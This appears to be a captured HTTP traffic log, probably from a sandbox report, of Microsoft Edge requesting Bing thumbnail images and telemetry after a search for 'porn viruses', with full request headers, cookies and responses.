2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22notebook%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1728144332207%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%228211.5%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1728144332209%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%228479.5%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1728144332209%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bc777b5c.1728144333.1d6fa688
GET

https://www.bing.com/th?id=OSK.f640b1aecef558b8fb4493af14e8c6e3&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OSK.f640b1aecef558b8fb4493af14e8c6e3&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=2592000
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 2995
Date: Sat, 05 Oct 2024 16:05:37 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bc777b5c.1728144337.1d6fa79e
GET

https://www.bing.com/th?id=OSK.2649f7e7cc97b3f670f28c0f227917e6&w=120&h=120&c=6&p=0&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OSK.2649f7e7cc97b3f670f28c0f227917e6&w=120&h=120&c=6&p=0&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=2592000
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 4769
Date: Sat, 05 Oct 2024 16:05:38 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bc777b5c.1728144338.1d6fce2f
GET

https://www.bing.com/th?id=OSK.d0ba43380642895acb1ae9c6468a39dc&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OSK.d0ba43380642895acb1ae9c6468a39dc&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=2592000
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 4658
Date: Sat, 05 Oct 2024 16:05:38 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bc777b5c.1728144338.1d6fcfe7
GET

https://www.bing.com/th?id=OSK.a65cf5186c4cac626439749c16b0c1f5&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OSK.a65cf5186c4cac626439749c16b0c1f5&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=2592000
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 2798
Date: Sat, 05 Oct 2024 16:05:40 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bc777b5c.1728144340.1d6fd12c
GET

https://www.bing.com/th?id=OSK.Ef6xyeDaKYpbQvn0wQ_puDAc7IZXvOSkyhMvbhhDQdY&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OSK.Ef6xyeDaKYpbQvn0wQ_puDAc7IZXvOSkyhMvbhhDQdY&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=2592000
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 5640
Date: Sat, 05 Oct 2024 16:05:41 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bc777b5c.1728144341.1d6fe397
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Avir%2Ci%3A14%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144340765%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avir%2Ci%3A14%22%2C%22AsResponseLength%22%3A%221157%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144340873%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22CustomData%22%3A%22%7B%20%5C%22q%5C%22%3A%20%5C%22virustotal%5C%22%2C%20%5C%22t%5C%22%3A%20%5C%22MB%5C%22%20%7D%22%2C%22T%22%3A%22CI.FirstEntity%22%2C%22TS%22%3A1728144340873%2C%22Name%22%3A%22EASEInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avir%2Ci%3A14%2Cig%3AE3C0127DC5634E8293170B7F849179C5%22%2C%22AnswerInfo%22%3A%22MB%3B10%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144340873%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviru%2Ci%3A16%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144342736%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviru%2Ci%3A15%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144342758%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Avir%2Ci%3A14%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144340765%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avir%2Ci%3A14%22%2C%22AsResponseLength%22%3A%221157%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144340873%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22CustomData%22%3A%22%7B%20%5C%22q%5C%22%3A%20%5C%22virustotal%5C%22%2C%20%5C%22t%5C%22%3A%20%5C%22MB%5C%22%20%7D%22%2C%22T%22%3A%22CI.FirstEntity%22%2C%22TS%22%3A1728144340873%2C%22Name%22%3A%22EASEInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Avir%2Ci%3A14%2Cig%3AE3C0127DC5634E8293170B7F849179C5%22%2C%22AnswerInfo%22%3A%22MB%3B10%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144340873%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviru%2Ci%3A16%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144342736%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviru%2Ci%3A15%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144342758%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
